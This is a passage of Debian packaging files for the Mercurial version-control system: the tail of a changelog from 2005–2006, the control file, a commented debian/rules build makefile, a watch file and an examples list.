- The usual array of bug fixes and documentation improvements. - The integrated web server is now more WSGI-compliant. - Work has begun to solidify Mercurial's API for use by third-party packages. -- Vincent Danjean Tue, 25 Jul 2006 19:21:13 +0200 mercurial (0.9-9) unstable; urgency=low * Force the use of python2.4 with a sed command. A race condition on some autobuilders makes that workaround needed. (Really closes: #378835) -- Vincent Danjean Thu, 20 Jul 2006 17:59:35 +0200 mercurial (0.9-8) unstable; urgency=low * do not use default python but python2.4 instead for hg : most code is python2.3 compatible (so we still compile .py files for pyhton2.3) but "hg help" need features for python2.4 Closes: #378835 Thanks David Douard for reporting this. * adding missing manpage hgignore (Closes: #378502) Thanks Baruch Even for reporting this. * remove hack in postinst (dpkg not replacing directory by symlink) as it is no more useful (directory was in /usr/lib/python2.3, symlink in now in /usr/lib/python2.4) * Create symlinks for the templates directory within the mercurial directory (and not in another python serch path) (Closes: #378538) -- Vincent Danjean Wed, 19 Jul 2006 12:25:30 +0200 mercurial (0.9-7) unstable; urgency=low * mercurial will use the default python interpreter -- Vincent Danjean Tue, 11 Jul 2006 23:12:14 +0200 mercurial (0.9-6) unstable; urgency=low * update to the new python policy * reenable the fix for #362487 as python2.3 is useable again -- Vincent Danjean Tue, 4 Jul 2006 00:19:50 +0200 mercurial (0.9-5) unstable; urgency=low * call dh_python with -V 2.4 argument -- Vincent Danjean Mon, 29 May 2006 09:18:53 +0200 mercurial (0.9-4) unstable; urgency=low * [debian/copyright] add copyright for Debian packaging * [debian/NEWS] talk about python2.3->python2.4 transition -- Vincent Danjean Wed, 17 May 2006 00:28:48 +0200 mercurial (0.9-3) unstable; urgency=low * [debian/compat] debhelper compat version dumped to 5 -- Vincent Danjean Sun, 14 May 2006 
21:27:43 +0200 mercurial (0.9-2) unstable; urgency=low * fix a bug in update/revert (patch from Vadim Gelfer already applied upstream) * [debian/control] build-depend on python as dh_python require it (package did not fail to build due to an indirect build-dependency but it is safer like that) -- Vincent Danjean Fri, 12 May 2006 19:30:44 +0200 mercurial (0.9-1) unstable; urgency=low * New upstream release Major changes between Mercurial 0.8.1 and 0.9: - The repository file format has been improved. - This has resulted in an average 40% reduction in disk space usage. - The new format (called RevlogNG) is now the default. - Mercurial works perfectly with both the old and new repository file formats. It can transfer changes transparently between repositories of either format. - To use the new repository format, simply use `hg clone --pull` to clone an existing repository. - Note: Versions 0.8.1 and earlier of Mercurial cannot read RevlogNG repositories directly, but they can `clone`, `pull` from, and `push` to servers that are serving RevlogNG repositories. - Memory usage has been improved by over 50% for many common operations. - Substantial performance improvements on large repositories. - New commands: - 'archive' - generate a directory tree snapshot, tarball, or zip file of a revision - Deprecated commands: - 'addremove' - replaced by 'add' and 'remove --after' - 'forget' - replaced by 'revert' - 'undo' - replaced by 'rollback' - New extensions: - Bugzilla integration hook - Email notification hook - Nested repositories are now supported. Mercurial will not recurse into a subdirectory that contains a '.hg' directory. It is treated as a separate repository. - The standalone web server, 'hg serve', is now threaded, so it can talk to multiple clients at a time. - The web server can now display a "message of the day". - Support added for hooks written in Python. - Many improvements and clarifications to built-in help. 
* [debian/control] set Standard-Version to 3.7.2 (no changes required) -- Vincent Danjean Thu, 11 May 2006 01:00:03 +0200 mercurial (0.8.1-6) unstable; urgency=low * cleanup patches applied on top of upstream sources send the interesting one to upstream before the 0.9 release -- Vincent Danjean Thu, 27 Apr 2006 03:20:24 +0200 mercurial (0.8.1-5) unstable; urgency=low * use python2.4 instead of standard python (2.3 for now): this allows to use hglib backend with tailor * several minor fixes so that tailor works with the 'hglib' backend these are submitted upstream * hardcode python interpreter in script instead of using /usr/bin/env as suggested by the python policy * remove previous hack (dpkg not replacing directory by symlink) as it is no more useful (directory was in /usr/lib/python2.3, symlink in now in /usr/lib/python2.4) -- Vincent Danjean Mon, 17 Apr 2006 12:21:24 +0200 mercurial (0.8.1-4) unstable; urgency=low * directory doesn't get replaced by symlink (Closes: #362487) and dpkg does not say anything ! Thanks Norbert Tretkowski -- Vincent Danjean Fri, 14 Apr 2006 00:38:10 +0200 mercurial (0.8.1-3) unstable; urgency=low * Really fix #361897 (Thanks Darren Salt again) -- Vincent Danjean Wed, 12 Apr 2006 20:33:45 +0200 mercurial (0.8.1-2) unstable; urgency=low * Fix new tag syntax for hgk. Thanks Darren Salt (Closes: #361897) -- Vincent Danjean Tue, 11 Apr 2006 13:25:04 +0200 mercurial (0.8.1-1) unstable; urgency=low * New upstream release Major changes from 0.8 to 0.8.1: - new extensions: mq (manage a queue of patches, like quilt only better) (Closes: #343824) email (send changes as series of email patches) - new command: merge (replaces "update -m") - improved commands: log (--limit option added), pull/push ("-r" works on specific revisions), revert (rewritten, much better) - comprehensive hook support - output templating added, supporting e.g. 
GNU changelog style - Windows, Mac OS X: prebuilt binary packages, better support - many reliability, performance, and memory usage improvements -- Vincent Danjean Mon, 10 Apr 2006 22:09:16 +0200 mercurial (0.8-3) unstable; urgency=low * Fix typo in long description -- Vincent Danjean Tue, 4 Apr 2006 03:30:22 +0200 mercurial (0.8-2) unstable; urgency=low * Add documentation about extensions packaged for Debian. -- Vincent Danjean Tue, 31 Jan 2006 11:14:52 +0100 mercurial (0.8-1) unstable; urgency=low * New upstream release Major changes from 0.7 to 0.8: - faster status, diff, and commit - reduced memory usage for push and pull - improved extension API - new bisect, gpg, hgk, and win32text extensions - short URLs, binary file handling, and optional gitweb skin for hgweb - numerous new command options including log --keyword and pull --rev - improved hooks and file filtering -- Vincent Danjean Mon, 30 Jan 2006 16:06:34 +0100 mercurial (0.7+20060110+0d36e3d7e2ea-1) experimental; urgency=low * package test to try upstream sources before 0.8 -- Vincent Danjean Tue, 10 Jan 2006 22:47:38 +0100 mercurial (0.7-8) unstable; urgency=low * Closes: #343459: correct FAQ URL * Closes: #343458: fix directory completion * Closes: #343472: clone does not work with path aliases (Thanks Daniel Kobras for these three bugreports with patch) -- Vincent Danjean Tue, 3 Jan 2006 21:13:23 +0100 mercurial (0.7-7) unstable; urgency=low * Add support for alias st for hg status (Closes: #340235) (backport from tip, thanks Michael Gebetsroither ) -- Vincent Danjean Tue, 22 Nov 2005 13:01:39 +0100 mercurial (0.7-6) unstable; urgency=low * Backport of the patch "fix handling of daylight saving time" from upstream (Closes: #336646) -- Vincent Danjean Wed, 2 Nov 2005 06:17:04 +0100 mercurial (0.7-5) unstable; urgency=low * Add hgweb.cgi and hgwebdir.cgi in examples (Closes: #332973) -- Vincent Danjean Sat, 15 Oct 2005 11:24:54 +0200 mercurial (0.7-4) unstable; urgency=low * backport from upstream of 
- use of 'hgext' directory for extensions - 'hgk.py' extension (was hgit before) => 'hg view' works ;-) * add 'Recommands: wish' for the hgk extension -- Vincent Danjean Fri, 23 Sep 2005 11:45:13 +0200 mercurial (0.7-3) unstable; urgency=low * Add system-wide config directory (so that extensions can be easyly added) * Enable hgit extension -- Vincent Danjean Tue, 20 Sep 2005 02:47:16 +0200 mercurial (0.7-2) unstable; urgency=low * Correct changelog.Debian (I forgot to add upstream changes in the previous entry) -- Vincent Danjean Sun, 18 Sep 2005 22:46:14 +0200 mercurial (0.7-1) unstable; urgency=low * New upstream release (Closes: #328725) core improved merge logic improved copy/rename support (still experimental) automatic binary file handling generic file filtering support various performance improvements command line new bundle/unbundle commands for exchanging native updates more natural support for remove, copy, and rename faster, more powerful log command new grep command for searching entire history support for plug-in extensions improved exception handling and debugging facilities hgweb optional downloading of tarballs and zip files Windows support hardlinking support newline conversion through file filtering contrib updated hgk * New package (a bit delayed due to a crash disk and a new job) * Upstream added support for options -h and --help (Closes: #324049) * renamming conffile 'bash_completion' to 'mercurial' (Closes: #325266) -- Vincent Danjean Sat, 17 Sep 2005 16:54:37 +0200 mercurial (0.6c-1) unstable; urgency=low * New upstream release What's new: core functionality ability to use tags to identify branches detect adding new heads with push protocol versioning for push/pull https: support minor merge fixes command line much more powerful path handling incoming/outgoing commands smarter import/export fewer long, confusing hashes to deal with many new command options and settings portability improved portability of test suite and support scripts 
improved Windows support web interface easy to set up multiple repository interface several new hgrc config options IPv6 support documentation improved built-in help and man pages a steadily growing wiki tutorial in multiple languages extras a highly functional bash auto-completion script a new Emacs mode -- Vincent Danjean Tue, 23 Aug 2005 11:01:36 +0200 mercurial (0.6b-2) unstable; urgency=low * Adds proper python dependencies * Recommends tkdiff or kdiff3 for merge purpose * Suggests meld as this is another merging program that can be used by mercurial (but this needs the user set the HGMERGE variable) * Closes: #316347: Please Recommands: meld -- Vincent Danjean Wed, 17 Aug 2005 10:33:33 +0200 mercurial (0.6b-1) unstable; urgency=low * New upstream release What's new: improved ui new clone command replaces mkdir+init+pull+update new revert command add range support and -p option to log to show patches tags command now supports local tags improved push and pull better exception and signal handling improved option parsing support for user-defined hooks (aka triggers) performance updates even faster import of large sets of patches faster delta generation faster annotate faster status and ignore improved web interface more conformant and compatible HTML output built-in RSS feeds better tags handling fast multiple keyword search portability work support for Windows is nearly complete should easily compile and install on any modern UNIX comes with RPM spec file and script and more doc and help updates improved test suite numerous bug fixes and cleanups -- Vincent Danjean Tue, 12 Jul 2005 11:45:13 +0200 mercurial (0.6-2) unstable; urgency=low * Add meld to Suggest as it is not used by default hgmerge (Closes: #316347: Please Recommands: meld) -- Vincent Danjean Thu, 30 Jun 2005 16:30:33 +0200 mercurial (0.6-1) unstable; urgency=low * New upstream release This release contains a huge number of improvements: improved source tracking multi-head support permission 
tracking rename and copy tracking improved tag handling friendlier, more robust command line interface integrated help faster startup better exception handling smarter three-way merge helper improved communication faster outstanding changeset detection SSH-based push support non-transparent proxy support improved configuration handling support for .hgrc and .hg/hgrc files save per-repo defaults for pull new delta extension faster, smaller, and simpler than GNU diff or xdiff faster commit, push/pull, and annotate improved interoperability convert-repo framework for importing from other SCMs can work with gitk and git-viz portability improvements tested on big and little-endian 32 and 64-bit UNIX platforms Windows support is nearly complete and much more numerous performance tweaks and bugfixes automated test suite updated docs and FAQ -- Vincent Danjean Sat, 25 Jun 2005 00:15:13 +0200 mercurial (0.5b+20050618-1) unstable; urgency=low * New upstream sources (tip 396:8f8bb77d560e70bcc95577e4dfa877df18d876ab) this fix a alignment bug reported on alpha * many others fix and improvments from upstream * Change short description Closes: #314577: Please spell out the abbreviation in the synopsis -- Vincent Danjean Sat, 18 Jun 2005 10:02:39 +0200 mercurial (0.5b+20050612-2) unstable; urgency=low * Fix spelling mistake (thanks Emanuele Aina) Closes: #314161: Small spelling error in documentation * New package that should solve the FTBFS due to the use of the boggus package debhelper 4.9.0 by autobuilders Closes: #313491: mercurial_0.5b+20050612-1: FTBFS: syntax error at /usr/bin/dh_strip line 191, near 'if' * Closes: #314577: Please spell out the abbreviation in the synopsis -- Vincent Danjean Fri, 17 Jun 2005 11:14:06 +0200 mercurial (0.5b+20050612-1) unstable; urgency=low * New upstream sources -- Vincent Danjean Sun, 12 Jun 2005 11:40:02 +0200 mercurial (0.5b-5) unstable; urgency=low * manually fix wrong build-dependencies that have been previously generated by cdbs (ie 
remove 'build-essential' and duplicates) -- Vincent Danjean Sat, 4 Jun 2005 09:16:40 +0200 mercurial (0.5b-4) unstable; urgency=low * remove automatic generation of control from control.in (with cdbs dependencies) as requested by ftpmaster to accept this NEW package (see still opened bugs #311724 for more information) -- Vincent Danjean Fri, 3 Jun 2005 08:57:06 +0200 mercurial (0.5b-3) unstable; urgency=low * First official Debian release. (Closes: #308873: ITP: mercurial -- scalable distributed SCM) -- Vincent Danjean Thu, 2 Jun 2005 08:55:53 +0200 mercurial (0.5b-2) unstable; urgency=low * package description improved from the mercurial ML * Add Homepage: to long description (thanks Anibal Monsalve Salazar) * Change Architecture from all to any as mercurial sources now have C files to compile (thanks Anibal Monsalve Salazar) * Update copyright (thanks Anibal Monsalve Salazar) * Add rcs and tkdiff to Recommands as hgmerge use it (only recommands and not depends because if the user set HGMERGE to kdiff3, he does not need them) * use hgmerge if HGMERGE is not set (patch submitted upstream) -- Vincent Danjean Wed, 1 Jun 2005 11:35:20 +0200 mercurial (0.5b-1) unstable; urgency=low * New upstream release -- Vincent Danjean Tue, 31 May 2005 00:00:29 +0200 mercurial (0.5-1) unstable; urgency=low * New upstream release -- Vincent Danjean Sun, 29 May 2005 21:36:55 +0200 mercurial (0.4f-1) unstable; urgency=low * New upstream release * english improved in description (thanks Jay Berkenbilt ) -- Vincent Danjean Sat, 14 May 2005 00:55:40 +0200 mercurial (0.4e-3) unstable; urgency=low * package description improved (thanks Bas Zoetekouw ) -- Vincent Danjean Fri, 13 May 2005 13:46:44 +0200 mercurial (0.4e-2) unstable; urgency=low * update description -- Vincent Danjean Thu, 12 May 2005 23:32:43 +0200 mercurial (0.4e-1) unstable; urgency=low * New upstream release -- Vincent Danjean Thu, 12 May 2005 23:13:54 +0200 mercurial (0.4b-2) unstable; urgency=low * add debian watch file 
* add depend on tkdiff * correct some lintian warnings -- Vincent Danjean Fri, 29 Apr 2005 12:59:33 +0200 mercurial (0.4b-1) unstable; urgency=low * Initial Release. -- Vincent Danjean Fri, 29 Apr 2005 08:54:25 +0200 debian/control0000664000000000000000000000502312266004045010572 0ustar Source: mercurial Section: vcs Priority: optional Maintainer: Ubuntu Developers XSBC-Original-Maintainer: Python Applications Packaging Team Uploaders: Vincent Danjean , Javi Merino , Tristan Seligmann Build-Depends: debhelper (>= 9), patchutils (>= 0.2.25), gettext, python-all-dev (>= 2.6.6-3~), python-docutils, python-roman, zip, unzip, bash-completion, netbase, Standards-Version: 3.9.5 Homepage: http://mercurial.selenic.com/ Vcs-Svn: svn://anonscm.debian.org/python-apps/packages/mercurial/trunk/ Vcs-Browser: http://anonscm.debian.org/viewvc/python-apps/packages/mercurial/trunk/ X-Python-Version: >= 2.4 XS-Testsuite: autopkgtest Package: mercurial-common Architecture: all Depends: ${misc:Depends}, ${python:Depends} Recommends: mercurial (>= ${source:Version}), ca-certificates Suggests: wish, python-mysqldb, python-pygments, python-openssl Breaks: mercurial (<< ${source:Version}) Replaces: mercurial (<< 1.4) Description: easy-to-use, scalable distributed version control system (common files) Mercurial is a fast, lightweight Source Control Management system designed for efficient handling of very large distributed projects. . This package contains the architecture independent components of Mercurial, and is generally useless without the mercurial package. 
Package: mercurial Architecture: any Depends: ${shlibs:Depends}, ${misc:Depends}, ${python:Depends}, ucf (>= 2.0020), mercurial-common (= ${source:Version}) Recommends: openssh-client, wish, Suggests: qct, vim | emacs, kdiff3 | kdiff3-qt | kompare | meld | tkcvs | mgdiff Breaks: hgsubversion (<< 1.5~), hgview (<< 1.7.1-1~), mercurial-git (<< 0.4.0-1~), qct (<< 1.7-2~), Description: easy-to-use, scalable distributed version control system Mercurial is a fast, lightweight Source Control Management system designed for efficient handling of very large distributed projects. . Its features include: * O(1) delta-compressed file storage and retrieval scheme * Complete cross-indexing of files and changesets for efficient exploration of project history * Robust SHA1-based integrity checking and append-only storage model * Decentralized development model with arbitrary merging between trees * High-speed HTTP-based network merge protocol * Easy-to-use command-line interface * Integrated stand-alone web interface * Small Python codebase . This package contains the architecture dependent files. debian/rules0000775000000000000000000001037112540325036010252 0ustar #!/usr/bin/make -f # -*- mode: makefile; coding: utf-8 -*- # Uncomment this to turn on verbose mode. 
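#export DH_VERBOSE=1

# Catch-all rule: every target that has no override below is handed to dh
# with the python2 and bash-completion addons enabled.
%:
	dh $@ --with python2,bash-completion

# Supported and default Python versions as printed by pyversions.
# Simple (:=) assignment runs each command once at parse time; the previous
# recursive (=) form re-ran the shell command on every expansion.
PYVERS := $(shell pyversions -vs)
PYVER_DEFAULT := $(shell pyversions -vd)

DEB_HOST_ARCH := $(shell dpkg-architecture -qDEB_HOST_ARCH)

# Build upstream's "all" target, then patch the generated manpage.
override_dh_auto_build:
	$(MAKE) all
# Do not start a line with a word with a dot in a manpage
	sed -i -e 's,^[.]\(hgignore\|hg/hgrc\),\\fP\1,' doc/hg.1

# Honour parallel=N from DEB_BUILD_OPTIONS by passing --jobs N to the tests.
ifneq (,$(filter parallel=%,$(DEB_BUILD_OPTIONS)))
  NJOBS := $(patsubst parallel=%,%,$(filter parallel=%,$(DEB_BUILD_OPTIONS)))
  PARALLEL_TEST_JOBS := --jobs $(NJOBS)
endif

# Each flag is "T" only when DEB_HOST_ARCH is exactly the named architecture.
# $(filter) is an exact word match and yields nothing for an empty
# DEB_HOST_ARCH; the previous $(subst)-based test set every flag to "T" when
# dpkg-architecture produced no output.
ARCH_IS_MIPS := $(if $(filter mips,$(DEB_HOST_ARCH)),T)
ARCH_IS_KFREEBSD-i386 := $(if $(filter kfreebsd-i386,$(DEB_HOST_ARCH)),T)
ARCH_IS_ARMEL := $(if $(filter armel,$(DEB_HOST_ARCH)),T)
ARCH_IS_SPARC := $(if $(filter sparc,$(DEB_HOST_ARCH)),T)

# Run the upstream test suite unless DEB_BUILD_OPTIONS contains nocheck.
override_dh_auto_test:
ifeq (,$(filter nocheck,$(DEB_BUILD_OPTIONS)))
# test-pull-pull-corruption tries to execute two hg commands at the
# same time to test for corruption. It does so by running an hg
# command in the background, sleeping one second and running the
# second command. In architectures with slow buildds, one second is
# not enough and the second test starts before the first one has
# started printing. This is hacky and we just enhance the hack by
# incrementing the sleep time in those architectures.
ifneq ($(or $(ARCH_IS_MIPS), $(ARCH_IS_KFREEBSD-i386), $(ARCH_IS_ARMEL), $(ARCH_IS_SPARC)),)
	sed -i.deb-backup -e 's/sleep 1/sleep 2/' $(CURDIR)/tests/test-pull-pull-corruption.t
endif
# http_proxy is emptied for the test command only.
# NOTE(review): presumably so the suite's HTTP tests do not go through a
# proxy inherited from the build environment -- confirm.
	http_proxy='' dh_auto_test -- TESTFLAGS="--verbose --timeout 1440 $(PARALLEL_TEST_JOBS)"
# Strip the .deb-backup suffix again, restoring the test file saved by
# sed -i.deb-backup above. This line is not reached when dh_auto_test fails.
	rename.ul .deb-backup '' $(CURDIR)/tests/*
endif

# One install-python<version> prerequisite per supported Python version.
override_dh_auto_install: $(PYVERS:%=install-python%)

# Install into debian/tmp with the interpreter named by the pattern stem.
install-python%:
	python$* setup.py install --root $(CURDIR)/debian/tmp --install-layout=deb
# Do not hardcode the python interpreter: line 1 of the installed hg script
# is replaced with the unversioned /usr/bin/python shebang, so it is not
# tied to the python$* used for this install run.
	sed -i '1c#!/usr/bin/python' debian/tmp/usr/bin/hg

# After dh_install, post-process whichever binary package trees exist by
# re-invoking this file for the matching install-arch* target.
override_dh_install:
	dh_install
	if test -d $(CURDIR)/debian/mercurial ; then \
		$(MAKE) -f debian/rules install-archdep ; \
	fi
	if test -d $(CURDIR)/debian/mercurial-common ; then \
		$(MAKE) -f debian/rules install-archindep ;\
	fi

install-archdep:
# remove arch-independent python stuff
# (first find expression: delete every non-directory that is not a *.so;
#  after the "," operator: delete directories that are empty)
	find debian/mercurial/usr/lib \
		! -name '*.so' ! -type d -delete , \
		-type d -empty -delete

install-archindep:
# Install system-wide conffiles. Note the rename from .hgrc
# to .rc, which dh_install can't do if you list the file in
# mercurial-common.install
	install -m 644 \
		contrib/mergetools.hgrc \
		$(CURDIR)/debian/mercurial-common/etc/mercurial/hgrc.d/mergetools.rc
# NOTE(review): the content of debian/cacerts.hgrc is not visible here;
# presumably it points hg at the system CA bundle for HTTPS certificate
# verification. debian/control lists ca-certificates only as a Recommends
# of mercurial-common, so confirm what hg does when the bundle is absent.
	install -m 644 \
		debian/cacerts.hgrc \
		$(CURDIR)/debian/mercurial-common/etc/mercurial/hgrc.d/cacerts.rc
# Move templates and help installed by setup.py to their FHS-correct location
	mv $(CURDIR)/debian/mercurial-common/usr/lib/python$(PYVER_DEFAULT)/dist-packages/mercurial/templates \
		$(CURDIR)/debian/mercurial-common/usr/lib/python$(PYVER_DEFAULT)/dist-packages/mercurial/help \
		$(CURDIR)/debian/mercurial-common/usr/share/mercurial
	mv $(CURDIR)/debian/mercurial-common/usr/lib/python$(PYVER_DEFAULT)/dist-packages/mercurial/locale \
		$(CURDIR)/debian/mercurial-common/usr/share
# If more than one Python version is supported, clean up the templates
# and help installed for the other versions
# (the leading "-" lets the build continue if rm fails; the path arguments
#  of this rm follow below)
	-rm -rf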
$(CURDIR)/debian/mercurial-common/usr/lib/python*/dist-packages/mercurial/templates \ $(CURDIR)/debian/mercurial-common/usr/lib/python*/dist-packages/mercurial/help \ $(CURDIR)/debian/mercurial-common/usr/lib/python*/dist-packages/mercurial/locale \ # remove arch-dependent python stuff find debian/mercurial-common/usr/lib \ -name '*.so' ! -type d -delete , \ -type d -empty -delete override_dh_python2: dh_python2 find debian/mercurial/usr/share -type d -empty -delete override_dh_auto_clean: mercurial/__version__.py cp -a mercurial/__version__.py mercurial/__version__.py.save dh_auto_clean mv mercurial/__version__.py.save mercurial/__version__.py $(RM) -rv tmp/ override_dh_clean: dh_clean -rm -f tests/test-check-pyflakes.t mercurial/__version__.py: @echo "$@ is missing (you probably call 'make clean' directly)." @echo "Restore it from sources before building the package" @echo "Aborting." exit 1 debian/watch0000664000000000000000000000031212261306601010212 0ustar # format version number, currently 3; this line is compulsory! version=3 opts="uversionmangle=s/-rc/~rc/,pgpsigurlmangle=s/$/.asc/" \ http://www.selenic.com/mercurial/release/mercurial-(.*)\.tar\.gz debian/compat0000664000000000000000000000000212201757705010374 0ustar 9 debian/mercurial-common.examples0000664000000000000000000000051612216001724014176 0ustar hgeditor contrib/dumprevlog contrib/hgsh contrib/hgweb.fcgi contrib/hgweb.wsgi contrib/mercurial.el contrib/perf.py contrib/python-hook-examples.py contrib/sample.hgrc contrib/simplemerge contrib/tcsh_completion contrib/tcsh_completion_build.sh contrib/tmplrewrite.py contrib/undumprevlog contrib/vim contrib/zsh_completion hgweb.cgi